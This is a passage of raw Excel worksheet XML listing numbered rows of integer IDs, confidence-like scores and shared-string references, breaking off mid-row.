    <row r="2291" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2291" s="1">
        <v>2289</v>
      </c>
      <c r="B2291">
        <v>6806</v>
      </c>
      <c r="C2291">
        <v>6806</v>
      </c>
      <c r="D2291">
        <v>1</v>
      </c>
      <c r="E2291">
        <v>0.53619998693466187</v>
      </c>
      <c r="F2291" t="s">
        <v>3911</v>
      </c>
      <c r="G2291" t="s">
        <v>4522</v>
      </c>
      <c r="H2291" t="s">
        <v>4523</v>
      </c>
    </row>
    <row r="2292" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2292" s="1">
        <v>2290</v>
      </c>
      <c r="B2292">
        <v>6130</v>
      </c>
      <c r="C2292">
        <v>6130</v>
      </c>
      <c r="D2292">
        <v>1</v>
      </c>
      <c r="E2292">
        <v>0.50970000028610229</v>
      </c>
      <c r="F2292" t="s">
        <v>3911</v>
      </c>
      <c r="G2292" t="s">
        <v>4524</v>
      </c>
      <c r="H2292" t="s">
        <v>4525</v>
      </c>
    </row>
    <row r="2293" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2293" s="1">
        <v>2291</v>
      </c>
      <c r="B2293">
        <v>4064</v>
      </c>
      <c r="C2293">
        <v>4064</v>
      </c>
      <c r="D2293">
        <v>1</v>
      </c>
      <c r="E2293">
        <v>0.43880000710487371</v>
      </c>
      <c r="F2293" t="s">
        <v>3911</v>
      </c>
      <c r="G2293" t="s">
        <v>4526</v>
      </c>
      <c r="H2293" t="s">
        <v>4527</v>
      </c>
    </row>
    <row r="2294" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2294" s="1">
        <v>2292</v>
      </c>
      <c r="B2294">
        <v>5395</v>
      </c>
      <c r="C2294">
        <v>5395</v>
      </c>
      <c r="D2294">
        <v>1</v>
      </c>
      <c r="E2294">
        <v>0.80140000581741333</v>
      </c>
      <c r="F2294" t="s">
        <v>3911</v>
      </c>
      <c r="G2294" t="s">
        <v>4528</v>
      </c>
      <c r="H2294" t="s">
        <v>4529</v>
      </c>
    </row>
    <row r="2295" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2295" s="1">
        <v>2293</v>
      </c>
      <c r="B2295">
        <v>7815</v>
      </c>
      <c r="C2295">
        <v>7815</v>
      </c>
      <c r="D2295">
        <v>1</v>
      </c>
      <c r="E2295">
        <v>0.99949997663497925</v>
      </c>
      <c r="F2295" t="s">
        <v>3911</v>
      </c>
      <c r="G2295" t="s">
        <v>4530</v>
      </c>
      <c r="H2295" t="s">
        <v>4531</v>
      </c>
    </row>
    <row r="2296" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2296" s="1">
        <v>2294</v>
      </c>
      <c r="B2296">
        <v>306</v>
      </c>
      <c r="C2296">
        <v>306</v>
      </c>
      <c r="D2296">
        <v>1</v>
      </c>
      <c r="E2296">
        <v>0.51810002326965332</v>
      </c>
      <c r="F2296" t="s">
        <v>3911</v>
      </c>
      <c r="G2296" t="s">
        <v>4532</v>
      </c>
      <c r="H2296" t="s">
        <v>4533</v>
      </c>
    </row>
    <row r="2297" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2297" s="1">
        <v>2295</v>
      </c>
      <c r="B2297">
        <v>5701</v>
      </c>
      <c r="C2297">
        <v>5701</v>
      </c>
      <c r="D2297">
        <v>1</v>
      </c>
      <c r="E2297">
        <v>0.99949997663497925</v>
      </c>
      <c r="F2297" t="s">
        <v>3911</v>
      </c>
      <c r="G2297" t="s">
        <v>4534</v>
      </c>
      <c r="H2297" t="s">
        <v>4535</v>
      </c>
    </row>
    <row r="2298" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2298" s="1">
        <v>2296</v>
      </c>
      <c r="B2298">
        <v>317</v>
      </c>
      <c r="C2298">
        <v>317</v>
      </c>
      <c r="D2298">
        <v>1</v>
      </c>
      <c r="E2298">
        <v>0.87239998579025269</v>
      </c>
      <c r="F2298" t="s">
        <v>3911</v>
      </c>
      <c r="G2298" t="s">
        <v>4536</v>
      </c>
      <c r="H2298" t="s">
        <v>4537</v>
      </c>
    </row>
    <row r="2299" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2299" s="1">
        <v>2297</v>
      </c>
      <c r="B2299">
        <v>2940</v>
      </c>
      <c r="C2299">
        <v>2940</v>
      </c>
      <c r="D2299">
        <v>1</v>
      </c>
      <c r="E2299">
        <v>0.99790000915527344</v>
      </c>
      <c r="F2299" t="s">
        <v>3911</v>
      </c>
      <c r="G2299" t="s">
        <v>4538</v>
      </c>
      <c r="H2299" t="s">
        <v>4539</v>
      </c>
    </row>
    <row r="2300" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2300" s="1">
        <v>2298</v>
      </c>
      <c r="B2300">
        <v>6808</v>
      </c>
      <c r="C2300">
        <v>6808</v>
      </c>
      <c r="D2300">
        <v>1</v>
      </c>
      <c r="E2300">
        <v>0.54680001735687256</v>
      </c>
      <c r="F2300" t="s">
        <v>3911</v>
      </c>
      <c r="G2300" t="s">
        <v>4540</v>
      </c>
      <c r="H2300" t="s">
        <v>4541</v>
      </c>
    </row>
    <row r="2301" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2301" s="1">
        <v>2299</v>
      </c>
      <c r="B2301">
        <v>5247</v>
      </c>
      <c r="C2301">
        <v>5247</v>
      </c>
      <c r="D2301">
        <v>1</v>
      </c>
      <c r="E2301">
        <v>0.99849998950958252</v>
      </c>
      <c r="F2301" t="s">
        <v>3911</v>
      </c>
      <c r="G2301" t="s">
        <v>4542</v>
      </c>
      <c r="H2301" t="s">
        <v>4543</v>
      </c>
    </row>
    <row r="2302" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2302" s="1">
        <v>2300</v>
      </c>
      <c r="B2302">
        <v>3230</v>
      </c>
      <c r="C2302">
        <v>3230</v>
      </c>
      <c r="D2302">
        <v>1</v>
      </c>
      <c r="E2302">
        <v>0.52100002765655518</v>
      </c>
      <c r="F2302" t="s">
        <v>3911</v>
      </c>
      <c r="G2302" t="s">
        <v>4544</v>
      </c>
      <c r="H2302" t="s">
        <v>4545</v>
      </c>
    </row>
    <row r="2303" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2303" s="1">
        <v>2301</v>
      </c>
      <c r="B2303">
        <v>2919</v>
      </c>
      <c r="C2303">
        <v>2919</v>
      </c>
      <c r="D2303">
        <v>1</v>
      </c>
      <c r="E2303">
        <v>0.75620001554489136</v>
      </c>
      <c r="F2303" t="s">
        <v>3911</v>
      </c>
      <c r="G2303" t="s">
        <v>4546</v>
      </c>
      <c r="H2303" t="s">
        <v>4547</v>
      </c>
    </row>
    <row r="2304" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2304" s="1">
        <v>2302</v>
      </c>
      <c r="B2304">
        <v>6644</v>
      </c>
      <c r="C2304">
        <v>6644</v>
      </c>
      <c r="D2304">
        <v>1</v>
      </c>
      <c r="E2304">
        <v>0.48849999904632568</v>
      </c>
      <c r="F2304" t="s">
        <v>3911</v>
      </c>
      <c r="G2304" t="s">
        <v>4548</v>
      </c>
      <c r="H2304" t="s">
        <v>4549</v>
      </c>
    </row>
    <row r="2305" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2305" s="1">
        <v>2303</v>
      </c>
      <c r="B2305">
        <v>6148</v>
      </c>
      <c r="C2305">
        <v>6148</v>
      </c>
      <c r="D2305">
        <v>1</v>
      </c>
      <c r="E2305">
        <v>0.99849998950958252</v>
      </c>
      <c r="F2305" t="s">
        <v>3911</v>
      </c>
      <c r="G2305" t="s">
        <v>4550</v>
      </c>
      <c r="H2305" t="s">
        <v>4551</v>
      </c>
    </row>
    <row r="2306" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2306" s="1">
        <v>2304</v>
      </c>
      <c r="B2306">
        <v>3912</v>
      </c>
      <c r="C2306">
        <v>3912</v>
      </c>
      <c r="D2306">
        <v>1</v>
      </c>
      <c r="E2306">
        <v>0.99910002946853638</v>
      </c>
      <c r="F2306" t="s">
        <v>3911</v>
      </c>
      <c r="G2306" t="s">
        <v>4552</v>
      </c>
      <c r="H2306" t="s">
        <v>4553</v>
      </c>
    </row>
    <row r="2307" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2307" s="1">
        <v>2305</v>
      </c>
      <c r="B2307">
        <v>6783</v>
      </c>
      <c r="C2307">
        <v>6783</v>
      </c>
      <c r="D2307">
        <v>1</v>
      </c>
      <c r="E2307">
        <v>0.99790000915527344</v>
      </c>
      <c r="F2307" t="s">
        <v>3911</v>
      </c>
      <c r="G2307" t="s">
        <v>4554</v>
      </c>
      <c r="H2307" t="s">
        <v>4555</v>
      </c>
    </row>
    <row r="2308" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2308" s="1">
        <v>2306</v>
      </c>
      <c r="B2308">
        <v>4006</v>
      </c>
      <c r="C2308">
        <v>4006</v>
      </c>
      <c r="D2308">
        <v>1</v>
      </c>
      <c r="E2308">
        <v>0.98360002040863037</v>
      </c>
      <c r="F2308" t="s">
        <v>3911</v>
      </c>
      <c r="G2308" t="s">
        <v>4556</v>
      </c>
      <c r="H2308" t="s">
        <v>4557</v>
      </c>
    </row>
    <row r="2309" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2309" s="1">
        <v>2307</v>
      </c>
      <c r="B2309">
        <v>4007</v>
      </c>
      <c r="C2309">
        <v>4007</v>
      </c>
      <c r="D2309">
        <v>1</v>
      </c>
      <c r="E2309">
        <v>0.86299997568130493</v>
      </c>
      <c r="F2309" t="s">
        <v>3911</v>
      </c>
      <c r="G2309" t="s">
        <v>4558</v>
      </c>
      <c r="H2309" t="s">
        <v>4559</v>
      </c>
    </row>
    <row r="2310" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2310" s="1">
        <v>2308</v>
      </c>
      <c r="B2310">
        <v>6782</v>
      </c>
      <c r="C2310">
        <v>6782</v>
      </c>
      <c r="D2310">
        <v>1</v>
      </c>
      <c r="E2310">
        <v>0.99739998579025269</v>
      </c>
      <c r="F2310" t="s">
        <v>3911</v>
      </c>
      <c r="G2310" t="s">
        <v>4560</v>
      </c>
      <c r="H2310" t="s">
        <v>4561</v>
      </c>
    </row>
    <row r="2311" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2311" s="1">
        <v>2309</v>
      </c>
      <c r="B2311">
        <v>4224</v>
      </c>
      <c r="C2311">
        <v>4224</v>
      </c>
      <c r="D2311">
        <v>1</v>
      </c>
      <c r="E2311">
        <v>0.955299973487854</v>
      </c>
      <c r="F2311" t="s">
        <v>3911</v>
      </c>
      <c r="G2311" t="s">
        <v>4562</v>
      </c>
      <c r="H2311" t="s">
        <v>4563</v>
      </c>
    </row>
    <row r="2312" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2312" s="1">
        <v>2310</v>
      </c>
      <c r="B2312">
        <v>6645</v>
      </c>
      <c r="C2312">
        <v>6645</v>
      </c>
      <c r="D2312">
        <v>1</v>
      </c>
      <c r="E2312">
        <v>0.98600000143051147</v>
      </c>
      <c r="F2312" t="s">
        <v>3911</v>
      </c>
      <c r="G2312" t="s">
        <v>4564</v>
      </c>
      <c r="H2312" t="s">
        <v>4565</v>
      </c>
    </row>
    <row r="2313" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2313" s="1">
        <v>2311</v>
      </c>
      <c r="B2313">
        <v>4008</v>
      </c>
      <c r="C2313">
        <v>4008</v>
      </c>
      <c r="D2313">
        <v>1</v>
      </c>
      <c r="E2313">
        <v>0.8531000018119812</v>
      </c>
      <c r="F2313" t="s">
        <v>3911</v>
      </c>
      <c r="G2313" t="s">
        <v>4566</v>
      </c>
      <c r="H2313" t="s">
        <v>4567</v>
      </c>
    </row>
    <row r="2314" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2314" s="1">
        <v>2312</v>
      </c>
      <c r="B2314">
        <v>5294</v>
      </c>
      <c r="C2314">
        <v>5294</v>
      </c>
      <c r="D2314">
        <v>1</v>
      </c>
      <c r="E2314">
        <v>0.79970002174377441</v>
      </c>
      <c r="F2314" t="s">
        <v>3911</v>
      </c>
      <c r="G2314" t="s">
        <v>4568</v>
      </c>
      <c r="H2314" t="s">
        <v>4569</v>
      </c>
    </row>
    <row r="2315" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2315" s="1">
        <v>2313</v>
      </c>
      <c r="B2315">
        <v>4013</v>
      </c>
      <c r="C2315">
        <v>4013</v>
      </c>
      <c r="D2315">
        <v>1</v>
      </c>
      <c r="E2315">
        <v>0.73449999094009399</v>
      </c>
      <c r="F2315" t="s">
        <v>3911</v>
      </c>
      <c r="G2315" t="s">
        <v>4570</v>
      </c>
      <c r="H2315" t="s">
        <v>4571</v>
      </c>
    </row>
    <row r="2316" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2316" s="1">
        <v>2314</v>
      </c>
      <c r="B2316">
        <v>5652</v>
      </c>
      <c r="C2316">
        <v>5652</v>
      </c>
      <c r="D2316">
        <v>1</v>
      </c>
      <c r="E2316">
        <v>0.98009997606277466</v>
      </c>
      <c r="F2316" t="s">
        <v>3911</v>
      </c>
      <c r="G2316" t="s">
        <v>4572</v>
      </c>
      <c r="H2316" t="s">
        <v>4573</v>
      </c>
    </row>
    <row r="2317" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2317" s="1">
        <v>2315</v>
      </c>
      <c r="B2317">
        <v>5713</v>
      </c>
      <c r="C2317">
        <v>5713</v>
      </c>
      <c r="D2317">
        <v>1</v>
      </c>
      <c r="E2317">
        <v>0.99949997663497925</v>
      </c>
      <c r="F2317" t="s">
        <v>3911</v>
      </c>
      <c r="G2317" t="s">
        <v>4574</v>
      </c>
      <c r="H2317" t="s">
        <v>4575</v>
      </c>
    </row>
    <row r="2318" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2318" s="1">
        <v>2316</v>
      </c>
      <c r="B2318">
        <v>6780</v>
      </c>
      <c r="C2318">
        <v>6780</v>
      </c>
      <c r="D2318">
        <v>1</v>
      </c>
      <c r="E2318">
        <v>0.99129998683929443</v>
      </c>
      <c r="F2318" t="s">
        <v>3911</v>
      </c>
      <c r="G2318" t="s">
        <v>4576</v>
      </c>
      <c r="H2318" t="s">
        <v>4577</v>
      </c>
    </row>
    <row r="2319" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2319" s="1">
        <v>2317</v>
      </c>
      <c r="B2319">
        <v>7792</v>
      </c>
      <c r="C2319">
        <v>7792</v>
      </c>
      <c r="D2319">
        <v>1</v>
      </c>
      <c r="E2319">
        <v>0.75010001659393311</v>
      </c>
      <c r="F2319" t="s">
        <v>3911</v>
      </c>
      <c r="G2319" t="s">
        <v>4578</v>
      </c>
      <c r="H2319" t="s">
        <v>4579</v>
      </c>
    </row>
    <row r="2320" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2320" s="1">
        <v>2318</v>
      </c>
      <c r="B2320">
        <v>4131</v>
      </c>
      <c r="C2320">
        <v>4131</v>
      </c>
      <c r="D2320">
        <v>1</v>
      </c>
      <c r="E2320">
        <v>0.57760000228881836</v>
      </c>
      <c r="F2320" t="s">
        <v>3911</v>
      </c>
      <c r="G2320" t="s">
        <v>4580</v>
      </c>
      <c r="H2320" t="s">
        <v>4581</v>
      </c>
    </row>
    <row r="2321" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2321" s="1">
        <v>2319</v>
      </c>
      <c r="B2321">
        <v>268</v>
      </c>
      <c r="C2321">
        <v>268</v>
      </c>
      <c r="D2321">
        <v>1</v>
      </c>
      <c r="E2321">
        <v>0.70920002460479736</v>
      </c>
      <c r="F2321" t="s">
        <v>3911</v>
      </c>
      <c r="G2321" t="s">
        <v>4582</v>
      </c>
      <c r="H2321" t="s">
        <v>4583</v>
      </c>
    </row>
    <row r="2322" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2322" s="1">
        <v>2320</v>
      </c>
      <c r="B2322">
        <v>3849</v>
      </c>
      <c r="C2322">
        <v>3849</v>
      </c>
      <c r="D2322">
        <v>1</v>
      </c>
      <c r="E2322">
        <v>0.99290001392364502</v>
      </c>
      <c r="F2322" t="s">
        <v>3911</v>
      </c>
      <c r="G2322" t="s">
        <v>4584</v>
      </c>
      <c r="H2322" t="s">
        <v>4585</v>
      </c>
    </row>
    <row r="2323" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2323" s="1">
        <v>2321</v>
      </c>
      <c r="B2323">
        <v>269</v>
      </c>
      <c r="C2323">
        <v>269</v>
      </c>
      <c r="D2323">
        <v>1</v>
      </c>
      <c r="E2323">
        <v>0.59759998321533203</v>
      </c>
      <c r="F2323" t="s">
        <v>3911</v>
      </c>
      <c r="G2323" t="s">
        <v>4586</v>
      </c>
      <c r="H2323" t="s">
        <v>4587</v>
      </c>
    </row>
    <row r="2324" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2324" s="1">
        <v>2322</v>
      </c>
      <c r="B2324">
        <v>6554</v>
      </c>
      <c r="C2324">
        <v>6554</v>
      </c>
      <c r="D2324">
        <v>1</v>
      </c>
      <c r="E2324">
        <v>0.58579999208450317</v>
      </c>
      <c r="F2324" t="s">
        <v>3911</v>
      </c>
      <c r="G2324" t="s">
        <v>4588</v>
      </c>
      <c r="H2324" t="s">
        <v>4589</v>
      </c>
    </row>
    <row r="2325" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2325" s="1">
        <v>2323</v>
      </c>
      <c r="B2325">
        <v>322</v>
      </c>
      <c r="C2325">
        <v>322</v>
      </c>
      <c r="D2325">
        <v>1</v>
      </c>
      <c r="E2325">
        <v>0.70209997892379761</v>
      </c>
      <c r="F2325" t="s">
        <v>3911</v>
      </c>
      <c r="G2325" t="s">
        <v>4590</v>
      </c>
      <c r="H2325" t="s">
        <v>4591</v>
      </c>
    </row>
    <row r="2326" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2326" s="1">
        <v>2324</v>
      </c>
      <c r="B2326">
        <v>3218</v>
      </c>
      <c r="C2326">
        <v>3218</v>
      </c>
      <c r="D2326">
        <v>1</v>
      </c>
      <c r="E2326">
        <v>0.618399977684021</v>
      </c>
      <c r="F2326" t="s">
        <v>3911</v>
      </c>
      <c r="G2326" t="s">
        <v>4592</v>
      </c>
      <c r="H2326" t="s">
        <v>4593</v>
      </c>
    </row>
    <row r="2327" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2327" s="1">
        <v>2325</v>
      </c>
      <c r="B2327">
        <v>3888</v>
      </c>
      <c r="C2327">
        <v>3888</v>
      </c>
      <c r="D2327">
        <v>1</v>
      </c>
      <c r="E2327">
        <v>0.9976000189781189</v>
      </c>
      <c r="F2327" t="s">
        <v>3911</v>
      </c>
      <c r="G2327" t="s">
        <v>4594</v>
      </c>
      <c r="H2327" t="s">
        <v>4595</v>
      </c>
    </row>
    <row r="2328" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2328" s="1">
        <v>2326</v>
      </c>
      <c r="B2328">
        <v>265</v>
      </c>
      <c r="C2328">
        <v>265</v>
      </c>
      <c r="D2328">
        <v>1</v>
      </c>
      <c r="E2328">
        <v>0.99720001220703125</v>
      </c>
      <c r="F2328" t="s">
        <v>3911</v>
      </c>
      <c r="G2328" t="s">
        <v>4596</v>
      </c>
      <c r="H2328" t="s">
        <v>4597</v>
      </c>
    </row>
    <row r="2329" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2329" s="1">
        <v>2327</v>
      </c>
      <c r="B2329">
        <v>7715</v>
      </c>
      <c r="C2329">
        <v>7715</v>
      </c>
      <c r="D2329">
        <v>1</v>
      </c>
      <c r="E2329">
        <v>0.99620002508163452</v>
      </c>
      <c r="F2329" t="s">
        <v>3911</v>
      </c>
      <c r="G2329" t="s">
        <v>4598</v>
      </c>
      <c r="H2329" t="s">
        <v>4599</v>
      </c>
    </row>
    <row r="2330" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2330" s="1">
        <v>2328</v>
      </c>
      <c r="B2330">
        <v>6636</v>
      </c>
      <c r="C2330">
        <v>6636</v>
      </c>
      <c r="D2330">
        <v>1</v>
      </c>
      <c r="E2330">
        <v>0.98909997940063477</v>
      </c>
      <c r="F2330" t="s">
        <v>3911</v>
      </c>
      <c r="G2330" t="s">
        <v>4600</v>
      </c>
      <c r="H2330" t="s">
        <v>4601</v>
      </c>
    </row>
    <row r="2331" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2331" s="1">
        <v>2329</v>
      </c>
      <c r="B2331">
        <v>4125</v>
      </c>
      <c r="C2331">
        <v>4125</v>
      </c>
      <c r="D2331">
        <v>1</v>
      </c>
      <c r="E2331">
        <v>0.99570000171661377</v>
      </c>
      <c r="F2331" t="s">
        <v>3911</v>
      </c>
      <c r="G2331" t="s">
        <v>4602</v>
      </c>
      <c r="H2331" t="s">
        <v>4603</v>
      </c>
    </row>
    <row r="2332" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2332" s="1">
        <v>2330</v>
      </c>
      <c r="B2332">
        <v>6560</v>
      </c>
      <c r="C2332">
        <v>6560</v>
      </c>
      <c r="D2332">
        <v>1</v>
      </c>
      <c r="E2332">
        <v>0.99779999256134033</v>
      </c>
      <c r="F2332" t="s">
        <v>3911</v>
      </c>
      <c r="G2332" t="s">
        <v>4604</v>
      </c>
      <c r="H2332" t="s">
        <v>4605</v>
      </c>
    </row>
    <row r="2333" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2333" s="1">
        <v>2331</v>
      </c>
      <c r="B2333">
        <v>2816</v>
      </c>
      <c r="C2333">
        <v>2816</v>
      </c>
      <c r="D2333">
        <v>1</v>
      </c>
      <c r="E2333">
        <v>0.99720001220703125</v>
      </c>
      <c r="F2333" t="s">
        <v>3911</v>
      </c>
      <c r="G2333" t="s">
        <v>4606</v>
      </c>
      <c r="H2333" t="s">
        <v>4607</v>
      </c>
    </row>
    <row r="2334" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2334" s="1">
        <v>2332</v>
      </c>
      <c r="B2334">
        <v>4335</v>
      </c>
      <c r="C2334">
        <v>4335</v>
      </c>
      <c r="D2334">
        <v>1</v>
      </c>
      <c r="E2334">
        <v>0.98760002851486206</v>
      </c>
      <c r="F2334" t="s">
        <v>3911</v>
      </c>
      <c r="G2334" t="s">
        <v>4608</v>
      </c>
      <c r="H2334" t="s">
        <v>4609</v>
      </c>
    </row>
    <row r="2335" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2335" s="1">
        <v>2333</v>
      </c>
      <c r="B2335">
        <v>303</v>
      </c>
      <c r="C2335">
        <v>303</v>
      </c>
      <c r="D2335">
        <v>1</v>
      </c>
      <c r="E2335">
        <v>0.76609998941421509</v>
      </c>
      <c r="F2335" t="s">
        <v>3911</v>
      </c>
      <c r="G2335" t="s">
        <v>4610</v>
      </c>
      <c r="H2335" t="s">
        <v>4611</v>
      </c>
    </row>
    <row r="2336" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2336" s="1">
        <v>2334</v>
      </c>
      <c r="B2336">
        <v>3226</v>
      </c>
      <c r="C2336">
        <v>3226</v>
      </c>
      <c r="D2336">
        <v>1</v>
      </c>
      <c r="E2336">
        <v>0.95230001211166382</v>
      </c>
      <c r="F2336" t="s">
        <v>3911</v>
      </c>
      <c r="G2336" t="s">
        <v>4612</v>
      </c>
      <c r="H2336" t="s">
        <v>4613</v>
      </c>
    </row>
    <row r="2337" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2337" s="1">
        <v>2335</v>
      </c>
      <c r="B2337">
        <v>2817</v>
      </c>
      <c r="C2337">
        <v>2817</v>
      </c>
      <c r="D2337">
        <v>1</v>
      </c>
      <c r="E2337">
        <v>0.98669999837875366</v>
      </c>
      <c r="F2337" t="s">
        <v>3911</v>
      </c>
      <c r="G2337" t="s">
        <v>4614</v>
      </c>
      <c r="H2337" t="s">
        <v>4615</v>
      </c>
    </row>
    <row r="2338" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2338" s="1">
        <v>2336</v>
      </c>
      <c r="B2338">
        <v>5719</v>
      </c>
      <c r="C2338">
        <v>5719</v>
      </c>
      <c r="D2338">
        <v>1</v>
      </c>
      <c r="E2338">
        <v>0.98680001497268677</v>
      </c>
      <c r="F2338" t="s">
        <v>3911</v>
      </c>
      <c r="G2338" t="s">
        <v>4616</v>
      </c>
      <c r="H2338" t="s">
        <v>3953</v>
      </c>
    </row>
    <row r="2339" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2339" s="1">
        <v>2337</v>
      </c>
      <c r="B2339">
        <v>5720</v>
      </c>
      <c r="C2339">
        <v>5720</v>
      </c>
      <c r="D2339">
        <v>1</v>
      </c>
      <c r="E2339">
        <v>0.81190001964569092</v>
      </c>
      <c r="F2339" t="s">
        <v>3911</v>
      </c>
      <c r="G2339" t="s">
        <v>4617</v>
      </c>
      <c r="H2339" t="s">
        <v>4618</v>
      </c>
    </row>
    <row r="2340" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2340" s="1">
        <v>2338</v>
      </c>
      <c r="B2340">
        <v>3224</v>
      </c>
      <c r="C2340">
        <v>3224</v>
      </c>
      <c r="D2340">
        <v>1</v>
      </c>
      <c r="E2340">
        <v>0.36719998717308039</v>
      </c>
      <c r="F2340" t="s">
        <v>3911</v>
      </c>
      <c r="G2340" t="s">
        <v>4619</v>
      </c>
      <c r="H2340" t="s">
        <v>4620</v>
      </c>
    </row>
    <row r="2341" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2341" s="1">
        <v>2339</v>
      </c>
      <c r="B2341">
        <v>6641</v>
      </c>
      <c r="C2341">
        <v>6641</v>
      </c>
      <c r="D2341">
        <v>1</v>
      </c>
      <c r="E2341">
        <v>0.99849998950958252</v>
      </c>
      <c r="F2341" t="s">
        <v>3911</v>
      </c>
      <c r="G2341" t="s">
        <v>4621</v>
      </c>
      <c r="H2341" t="s">
        <v>4622</v>
      </c>
    </row>
    <row r="2342" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2342" s="1">
        <v>2340</v>
      </c>
      <c r="B2342">
        <v>5718</v>
      </c>
      <c r="C2342">
        <v>5718</v>
      </c>
      <c r="D2342">
        <v>1</v>
      </c>
      <c r="E2342">
        <v>0.99970000982284546</v>
      </c>
      <c r="F2342" t="s">
        <v>3911</v>
      </c>
      <c r="G2342" t="s">
        <v>4623</v>
      </c>
      <c r="H2342" t="s">
        <v>4298</v>
      </c>
    </row>
    <row r="2343" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2343" s="1">
        <v>2341</v>
      </c>
      <c r="B2343">
        <v>2539</v>
      </c>
      <c r="C2343">
        <v>2539</v>
      </c>
      <c r="D2343">
        <v>1</v>
      </c>
      <c r="E2343">
        <v>0.55489999055862427</v>
      </c>
      <c r="F2343" t="s">
        <v>3911</v>
      </c>
      <c r="G2343" t="s">
        <v>4624</v>
      </c>
      <c r="H2343" t="s">
        <v>4625</v>
      </c>
    </row>
    <row r="2344" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2344" s="1">
        <v>2342</v>
      </c>
      <c r="B2344">
        <v>3221</v>
      </c>
      <c r="C2344">
        <v>3221</v>
      </c>
      <c r="D2344">
        <v>1</v>
      </c>
      <c r="E2344">
        <v>0.96219998598098755</v>
      </c>
      <c r="F2344" t="s">
        <v>3911</v>
      </c>
      <c r="G2344" t="s">
        <v>4626</v>
      </c>
      <c r="H2344" t="s">
        <v>4627</v>
      </c>
    </row>
    <row r="2345" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2345" s="1">
        <v>2343</v>
      </c>
      <c r="B2345">
        <v>5644</v>
      </c>
      <c r="C2345">
        <v>5644</v>
      </c>
      <c r="D2345">
        <v>1</v>
      </c>
      <c r="E2345">
        <v>0.80989998579025269</v>
      </c>
      <c r="F2345" t="s">
        <v>3911</v>
      </c>
      <c r="G2345" t="s">
        <v>4628</v>
      </c>
      <c r="H2345" t="s">
        <v>4629</v>
      </c>
    </row>
    <row r="2346" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2346" s="1">
        <v>2344</v>
      </c>
      <c r="B2346">
        <v>7812</v>
      </c>
      <c r="C2346">
        <v>7812</v>
      </c>
      <c r="D2346">
        <v>1</v>
      </c>
      <c r="E2346">
        <v>0.80519998073577881</v>
      </c>
      <c r="F2346" t="s">
        <v>3911</v>
      </c>
      <c r="G2346" t="s">
        <v>4630</v>
      </c>
      <c r="H2346" t="s">
        <v>4631</v>
      </c>
    </row>
    <row r="2347" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2347" s="1">
        <v>2345</v>
      </c>
      <c r="B2347">
        <v>5345</v>
      </c>
      <c r="C2347">
        <v>5345</v>
      </c>
      <c r="D2347">
        <v>1</v>
      </c>
      <c r="E2347">
        <v>0.52149999141693115</v>
      </c>
      <c r="F2347" t="s">
        <v>3911</v>
      </c>
      <c r="G2347" t="s">
        <v>4632</v>
      </c>
      <c r="H2347" t="s">
        <v>4633</v>
      </c>
    </row>
    <row r="2348" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2348" s="1">
        <v>2346</v>
      </c>
      <c r="B2348">
        <v>4230</v>
      </c>
      <c r="C2348">
        <v>4230</v>
      </c>
      <c r="D2348">
        <v>1</v>
      </c>
      <c r="E2348">
        <v>0.96820002794265747</v>
      </c>
      <c r="F2348" t="s">
        <v>3911</v>
      </c>
      <c r="G2348" t="s">
        <v>4634</v>
      </c>
      <c r="H2348" t="s">
        <v>4635</v>
      </c>
    </row>
    <row r="2349" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2349" s="1">
        <v>2347</v>
      </c>
      <c r="B2349">
        <v>5717</v>
      </c>
      <c r="C2349">
        <v>5717</v>
      </c>
